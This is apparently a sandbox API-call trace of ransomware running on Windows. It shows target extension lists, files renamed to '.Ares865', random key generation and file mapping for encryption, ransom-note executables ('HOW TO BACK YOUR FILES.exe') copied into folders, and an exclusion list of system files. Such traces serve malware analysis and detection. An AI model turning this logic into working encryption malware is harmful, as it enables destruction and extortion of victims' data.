(lpString1="msp", lpString2="edb") returned 1 [0091.312] lstrlenW (lpString="epim") returned 4 [0091.312] lstrcmpiW (lpString1=".msp", lpString2="epim") returned -1 [0091.312] lstrlenW (lpString="fcd") returned 3 [0091.312] lstrcmpiW (lpString1="msp", lpString2="fcd") returned 1 [0091.312] lstrlenW (lpString="fdb") returned 3 [0091.312] lstrcmpiW (lpString1="msp", lpString2="fdb") returned 1 [0091.312] lstrlenW (lpString="fic") returned 3 [0091.312] lstrcmpiW (lpString1="msp", lpString2="fic") returned 1 [0091.312] lstrlenW (lpString="flexolibrary") returned 12 [0091.312] lstrcmpiW (lpString1="0116_MUI.msp", lpString2="flexolibrary") returned -1 [0091.312] lstrlenW (lpString="fm5") returned 3 [0091.312] lstrcmpiW (lpString1="msp", lpString2="fm5") returned 1 [0091.312] lstrlenW (lpString="fmp") returned 3 [0091.312] lstrcmpiW (lpString1="msp", lpString2="fmp") returned 1 [0091.312] lstrlenW (lpString="fmp12") returned 5 [0091.312] lstrcmpiW (lpString1="I.msp", lpString2="fmp12") returned 1 [0091.312] lstrlenW (lpString="fmpsl") returned 5 [0091.312] lstrcmpiW (lpString1="I.msp", lpString2="fmpsl") returned 1 [0091.312] lstrlenW (lpString="fol") returned 3 [0091.312] lstrcmpiW (lpString1="msp", lpString2="fol") returned 1 [0091.312] lstrlenW (lpString="fp3") returned 3 [0091.312] lstrcmpiW (lpString1="msp", lpString2="fp3") returned 1 [0091.312] lstrlenW (lpString="fp4") returned 3 [0091.312] lstrcmpiW (lpString1="msp", lpString2="fp4") returned 1 [0091.312] lstrlenW (lpString="fp5") returned 3 [0091.312] lstrcmpiW (lpString1="msp", lpString2="fp5") returned 1 [0091.312] lstrlenW (lpString="fp7") returned 3 [0091.312] lstrcmpiW (lpString1="msp", lpString2="fp7") returned 1 [0091.312] lstrlenW (lpString="fpt") returned 3 [0091.312] lstrcmpiW (lpString1="msp", lpString2="fpt") returned 1 [0091.312] lstrlenW (lpString="frm") returned 3 [0091.312] lstrcmpiW (lpString1="msp", lpString2="frm") returned 1 [0091.312] lstrlenW (lpString="gdb") returned 3 [0091.312] lstrcmpiW (lpString1="msp", lpString2="gdb") returned 1 [0091.312] lstrlenW (lpString="gdb") returned 3 [0091.312] lstrcmpiW (lpString1="msp", lpString2="gdb") returned 1 [0091.313] lstrlenW (lpString="grdb") returned 4 [0091.313] lstrcmpiW (lpString1=".msp", lpString2="grdb") returned -1 [0091.313] lstrlenW (lpString="gwi") returned 3 [0091.313] lstrcmpiW (lpString1="msp", lpString2="gwi") returned 1 [0091.313] lstrlenW (lpString="hdb") returned 3 [0091.313] lstrcmpiW (lpString1="msp", lpString2="hdb") returned 1 [0091.313] lstrlenW (lpString="his") returned 3 [0091.313] lstrcmpiW (lpString1="msp", lpString2="his") returned 1 [0091.313] lstrlenW (lpString="ib") returned 2 [0091.313] lstrcmpiW (lpString1="sp", lpString2="ib") returned 1 [0091.313] lstrlenW (lpString="idb") returned 3 [0091.313] lstrcmpiW (lpString1="msp", lpString2="idb") returned 1 [0091.313] lstrlenW (lpString="ihx") returned 3 [0091.313] lstrcmpiW (lpString1="msp", lpString2="ihx") returned 1 [0091.313] lstrlenW (lpString="itdb") returned 4 [0091.313] lstrcmpiW (lpString1=".msp", lpString2="itdb") returned -1 [0091.313] lstrlenW (lpString="itw") returned 3 [0091.313] lstrcmpiW (lpString1="msp", lpString2="itw") returned 1 [0091.313] lstrlenW (lpString="jet") returned 3 [0091.313] lstrcmpiW (lpString1="msp", lpString2="jet") returned 1 [0091.313] lstrlenW (lpString="jtx") returned 3 [0091.313] lstrcmpiW (lpString1="msp", lpString2="jtx") returned 1 [0091.313] lstrlenW (lpString="kdb") returned 3 [0091.313] lstrcmpiW (lpString1="msp", lpString2="kdb") returned 1 [0091.313] lstrlenW (lpString="kexi") returned 4 [0091.313] lstrcmpiW (lpString1=".msp", lpString2="kexi") returned -1 [0091.313] lstrlenW (lpString="kexic") returned 5 [0091.313] lstrcmpiW (lpString1="I.msp", lpString2="kexic") returned -1 [0091.313] lstrlenW (lpString="kexis") returned 5 [0091.313] lstrcmpiW (lpString1="I.msp", lpString2="kexis") returned -1 [0091.313] lstrlenW (lpString="lgc") returned 3 [0091.313] lstrcmpiW (lpString1="msp", lpString2="lgc") returned 1 [0091.313] lstrlenW (lpString="lwx") returned 3 [0091.313] lstrcmpiW (lpString1="msp", lpString2="lwx") returned 1 [0091.313] lstrlenW (lpString="maf") returned 3 [0091.313] lstrcmpiW (lpString1="msp", lpString2="maf") returned 1 [0091.313] lstrlenW (lpString="maq") returned 3 [0091.313] lstrcmpiW (lpString1="msp", lpString2="maq") returned 1 [0091.314] lstrlenW (lpString="mar") returned 3 [0091.314] lstrcmpiW (lpString1="msp", lpString2="mar") returned 1 [0091.314] lstrlenW (lpString="marshal") returned 7 [0091.314] lstrcmpiW (lpString1="MUI.msp", lpString2="marshal") returned 1 [0091.314] lstrlenW (lpString="mas") returned 3 [0091.314] lstrcmpiW (lpString1="msp", lpString2="mas") returned 1 [0091.314] lstrlenW (lpString="mav") returned 3 [0091.314] lstrcmpiW (lpString1="msp", lpString2="mav") returned 1 [0091.314] lstrlenW (lpString="maw") returned 3 [0091.314] lstrcmpiW (lpString1="msp", lpString2="maw") returned 1 [0091.314] lstrlenW (lpString="mdbhtml") returned 7 [0091.314] lstrcmpiW (lpString1="MUI.msp", lpString2="mdbhtml") returned 1 [0091.314] lstrlenW (lpString="mdn") returned 3 [0091.314] lstrcmpiW (lpString1="msp", lpString2="mdn") returned 1 [0091.314] lstrlenW (lpString="mdt") returned 3 [0091.314] lstrcmpiW (lpString1="msp", lpString2="mdt") returned 1 [0091.314] lstrlenW (lpString="mfd") returned 3 [0091.314] lstrcmpiW (lpString1="msp", lpString2="mfd") returned 1 [0091.314] lstrlenW (lpString="mpd") returned 3 [0091.314] lstrcmpiW (lpString1="msp", lpString2="mpd") returned 1 [0091.314] lstrlenW (lpString="mrg") returned 3 [0091.314] lstrcmpiW (lpString1="msp", lpString2="mrg") returned 1 [0091.314] lstrlenW (lpString="mud") returned 3 [0091.314] lstrcmpiW (lpString1="msp", lpString2="mud") returned -1 [0091.314] lstrlenW (lpString="mwb") returned 3 [0091.314] lstrcmpiW (lpString1="msp", lpString2="mwb") returned -1 [0091.314] lstrlenW (lpString="myd") returned 3 [0091.314] lstrcmpiW (lpString1="msp", lpString2="myd") returned -1 [0091.314] lstrlenW (lpString="ndf") returned 3 [0091.314] lstrcmpiW (lpString1="msp", lpString2="ndf") returned -1 [0091.314] lstrlenW (lpString="nnt") returned 3 [0091.314] lstrcmpiW (lpString1="msp", lpString2="nnt") returned -1 [0091.314] lstrlenW (lpString="nrmlib") returned 6 [0091.314] lstrcmpiW (lpString1="UI.msp", lpString2="nrmlib") returned 1 [0091.314] lstrlenW (lpString="ns2") returned 3 [0091.314] lstrcmpiW (lpString1="msp", lpString2="ns2") returned -1 [0091.314] lstrlenW (lpString="ns3") returned 3 [0091.315] lstrcmpiW (lpString1="msp", lpString2="ns3") returned -1 [0091.315] lstrlenW (lpString="ns4") returned 3 [0091.315] lstrcmpiW (lpString1="msp", lpString2="ns4") returned -1 [0091.315] lstrlenW (lpString="nsf") returned 3 [0091.315] lstrcmpiW (lpString1="msp", lpString2="nsf") returned -1 [0091.315] lstrlenW (lpString="nv") returned 2 [0091.315] lstrcmpiW (lpString1="sp", lpString2="nv") returned 1 [0091.315] lstrlenW (lpString="nv2") returned 3 [0091.315] lstrcmpiW (lpString1="msp", lpString2="nv2") returned -1 [0091.315] lstrlenW (lpString="nwdb") returned 4 [0091.315] lstrcmpiW (lpString1=".msp", lpString2="nwdb") returned -1 [0091.315] lstrlenW (lpString="nyf") returned 3 [0091.315] lstrcmpiW (lpString1="msp", lpString2="nyf") returned -1 [0091.315] lstrlenW (lpString="odb") returned 3 [0091.315] lstrcmpiW (lpString1="msp", lpString2="odb") returned -1 [0091.315] lstrlenW (lpString="odb") returned 3 [0091.315] lstrcmpiW (lpString1="msp", lpString2="odb") returned -1 [0091.315] lstrlenW (lpString="oqy") returned 3 [0091.315] lstrcmpiW (lpString1="msp", lpString2="oqy") returned -1 [0091.315] lstrlenW (lpString="ora") returned 3 [0091.315] lstrcmpiW (lpString1="msp", lpString2="ora") returned -1 [0091.315] lstrlenW (lpString="orx") returned 3 [0091.315] lstrcmpiW (lpString1="msp", lpString2="orx") returned -1 [0091.315] lstrlenW (lpString="owc") returned 3 [0091.315] lstrcmpiW (lpString1="msp", lpString2="owc") returned -1 [0091.315] lstrlenW (lpString="p96") returned 3 [0091.315] lstrcmpiW (lpString1="msp", lpString2="p96") returned -1 [0091.315] lstrlenW (lpString="p97") returned 3 [0091.315] lstrcmpiW (lpString1="msp", lpString2="p97") returned -1 [0091.315] lstrlenW (lpString="pan") returned 3 [0091.315] lstrcmpiW (lpString1="msp", lpString2="pan") returned -1 [0091.315] lstrlenW (lpString="pdb") returned 3 [0091.315] lstrcmpiW (lpString1="msp", lpString2="pdb") returned -1 [0091.315] lstrlenW (lpString="pdm") returned 3 [0091.315] lstrcmpiW (lpString1="msp", lpString2="pdm") returned -1 [0091.315] lstrlenW (lpString="pnz") returned 3 [0091.315] lstrcmpiW (lpString1="msp", lpString2="pnz") returned -1 [0091.316] lstrlenW (lpString="qry") returned 3 [0091.316] lstrcmpiW (lpString1="msp", lpString2="qry") returned -1 [0091.316] lstrlenW (lpString="qvd") returned 3 [0091.316] lstrcmpiW (lpString1="msp", lpString2="qvd") returned -1 [0091.316] lstrlenW (lpString="rbf") returned 3 [0091.316] lstrcmpiW (lpString1="msp", lpString2="rbf") returned -1 [0091.316] lstrlenW (lpString="rctd") returned 4 [0091.316] lstrcmpiW (lpString1=".msp", lpString2="rctd") returned -1 [0091.316] lstrlenW (lpString="rod") returned 3 [0091.316] lstrcmpiW (lpString1="msp", lpString2="rod") returned -1 [0091.316] lstrlenW (lpString="rodx") returned 4 [0091.316] lstrcmpiW (lpString1=".msp", lpString2="rodx") returned -1 [0091.316] lstrlenW (lpString="rpd") returned 3 [0091.316] lstrcmpiW (lpString1="msp", lpString2="rpd") returned -1 [0091.316] lstrlenW (lpString="rsd") returned 3 [0091.316] lstrcmpiW (lpString1="msp", lpString2="rsd") returned -1 [0091.316] lstrlenW (lpString="sas7bdat") returned 8 [0091.316] lstrcmpiW (lpString1="_MUI.msp", lpString2="sas7bdat") returned -1 [0091.316] lstrlenW (lpString="sbf") returned 3 [0091.316] lstrcmpiW (lpString1="msp", lpString2="sbf") returned -1 [0091.316] lstrlenW (lpString="scx") returned 3 [0091.316] lstrcmpiW (lpString1="msp", lpString2="scx") returned -1 [0091.316] lstrlenW (lpString="sdb") returned 3 [0091.316] lstrcmpiW (lpString1="msp", lpString2="sdb") returned -1 [0091.316] lstrlenW (lpString="sdc") returned 3 [0091.316] lstrcmpiW (lpString1="msp", lpString2="sdc") returned -1 [0091.316] lstrlenW (lpString="sdf") returned 3 [0091.316] lstrcmpiW (lpString1="msp", lpString2="sdf") returned -1 [0091.316] lstrlenW (lpString="sis") returned 3 [0091.316] lstrcmpiW (lpString1="msp", lpString2="sis") returned -1 [0091.329] lstrlenW (lpString="spq") returned 3 [0091.329] lstrcmpiW (lpString1="msp", lpString2="spq") returned -1 [0091.329] lstrlenW (lpString="te") returned 2 [0091.329] lstrcmpiW (lpString1="sp", lpString2="te") returned -1 [0091.329] lstrlenW (lpString="teacher") returned 7 [0091.329] lstrcmpiW (lpString1="MUI.msp", lpString2="teacher") returned -1 [0091.329] lstrlenW (lpString="tmd") returned 3 [0091.329] lstrcmpiW (lpString1="msp", lpString2="tmd") returned -1 [0091.329] lstrlenW (lpString="tps") returned 3 [0091.329] lstrcmpiW (lpString1="msp", lpString2="tps") returned -1 [0091.329] lstrlenW (lpString="trc") returned 3 [0091.329] lstrcmpiW (lpString1="msp", lpString2="trc") returned -1 [0091.329] lstrlenW (lpString="trc") returned 3 [0091.329] lstrcmpiW (lpString1="msp", lpString2="trc") returned -1 [0091.329] lstrlenW (lpString="trm") returned 3 [0091.329] lstrcmpiW (lpString1="msp", lpString2="trm") returned -1 [0091.329] lstrlenW (lpString="udb") returned 3 [0091.329] lstrcmpiW (lpString1="msp", lpString2="udb") returned -1 [0091.329] lstrlenW (lpString="udl") returned 3 [0091.329] lstrcmpiW (lpString1="msp", lpString2="udl") returned -1 [0091.330] lstrlenW (lpString="usr") returned 3 [0091.330] lstrcmpiW (lpString1="msp", lpString2="usr") returned -1 [0091.330] lstrlenW (lpString="v12") returned 3 [0091.330] lstrcmpiW (lpString1="msp", lpString2="v12") returned -1 [0091.330] lstrlenW (lpString="vis") returned 3 [0091.330] lstrcmpiW (lpString1="msp", lpString2="vis") returned -1 [0091.330] lstrlenW (lpString="vpd") returned 3 [0091.330] lstrcmpiW (lpString1="msp", lpString2="vpd") returned -1 [0091.330] lstrlenW (lpString="vvv") returned 3 [0091.330] lstrcmpiW (lpString1="msp", lpString2="vvv") returned -1 [0091.330] lstrlenW (lpString="wdb") returned 3 [0091.330] lstrcmpiW (lpString1="msp", lpString2="wdb") returned -1 [0091.330] lstrlenW (lpString="wmdb") returned 4 [0091.330] lstrcmpiW (lpString1=".msp", lpString2="wmdb") returned -1 [0091.330] lstrlenW (lpString="wrk") returned 3 [0091.330] lstrcmpiW (lpString1="msp", lpString2="wrk") returned -1 [0091.330] lstrlenW (lpString="xdb") returned 3 [0091.330] lstrcmpiW (lpString1="msp", lpString2="xdb") returned -1 [0091.330] lstrlenW (lpString="xld") returned 3 [0091.330] lstrcmpiW (lpString1="msp", lpString2="xld") returned -1 [0091.330] lstrlenW (lpString="xmlff") returned 5 [0091.330] lstrcmpiW (lpString1="I.msp", lpString2="xmlff") returned -1 [0091.330] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp.Ares865") returned 244 [0091.330] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\arm\\reader_10.0.0\\adberdrupd10116_mui.msp"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp.Ares865" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\arm\\reader_10.0.0\\adberdrupd10116_mui.msp.ares865"), dwFlags=0x1) returned 1 [0091.332] CreateFileW (lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp.Ares865" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\arm\\reader_10.0.0\\adberdrupd10116_mui.msp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0091.332] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=17420288) returned 1 [0091.332] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0091.332] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0091.332] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0091.333] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0091.333] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0091.333] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.333] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x109d300, lpName=0x0) returned 0x15c [0091.335] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x1000000, dwNumberOfBytesToMap=0x9d300) returned 0xdd0000 [0091.489] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0091.489] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0091.489] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.490] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0091.490] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0091.490] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31b0d0 [0091.490] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0091.490] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31b0d0 | out: hHeap=0x2b0000) returned 1 [0091.490] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0091.490] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0091.490] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0091.490] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0091.490] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0091.490] UnmapViewOfFile (lpBaseAddress=0xdd0000) returned 1 [0091.496] CloseHandle (hObject=0x15c) returned 1 [0091.496] CloseHandle (hObject=0x118) returned 1 [0091.496] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0091.496] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0091.496] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0091.505] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4cfe13c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0091.505] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0091.505] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4cfe13c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0091.505] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0091.505] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7bd0 [0091.505] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat" [0091.505] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6cf0 | out: hHeap=0x2b0000) returned 1 [0091.505] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7bc8 | out: hHeap=0x2b0000) returned 1 [0091.505] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned 202 [0091.505] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat" [0091.505] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.505] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.506] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.507] GetLastError () returned 0x0 [0091.507] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.507] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.507] CloseHandle (hObject=0x120) returned 1 [0091.507] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.507] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.507] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.507] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.507] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.507] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0091.507] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.507] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.507] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0091.507] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0091.507] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0091.507] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 1 [0091.507] lstrcmpiW (lpString1="10.0", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.507] lstrcmpiW (lpString1="10.0", lpString2="aoldtz.exe") returned -1 [0091.507] lstrcmpiW (lpString1="10.0", lpString2=".") returned 1 [0091.507] lstrcmpiW (lpString1="10.0", lpString2="..") returned 1 [0091.507] lstrcmpiW (lpString1="10.0", lpString2="windows") returned -1 [0091.508] lstrcmpiW (lpString1="10.0", lpString2="bootmgr") returned -1 [0091.508] lstrcmpiW (lpString1="10.0", lpString2="temp") returned -1 [0091.508] lstrcmpiW (lpString1="10.0", lpString2="pagefile.sys") returned -1 [0091.508] lstrcmpiW (lpString1="10.0", lpString2="boot") returned -1 [0091.508] lstrcmpiW (lpString1="10.0", lpString2="ids.txt") returned -1 [0091.508] lstrcmpiW (lpString1="10.0", lpString2="ntuser.dat") returned -1 [0091.508] lstrcmpiW (lpString1="10.0", lpString2="perflogs") returned -1 [0091.508] lstrcmpiW (lpString1="10.0", lpString2="MSBuild") returned -1 [0091.508] lstrlenW (lpString="10.0") returned 4 [0091.508] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\*") returned 204 [0091.508] lstrcpyW (in: lpString1=0x2cce596, lpString2="10.0" | out: lpString1="10.0") returned="10.0" [0091.508] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7bc8 [0091.508] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1a0) returned 0x330fc8 [0091.508] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bd0 | out: ListHead=0x2e7710, ListEntry=0x2e7bd0) returned 0x2e7b70 [0091.508] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4cfe13c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0091.508] 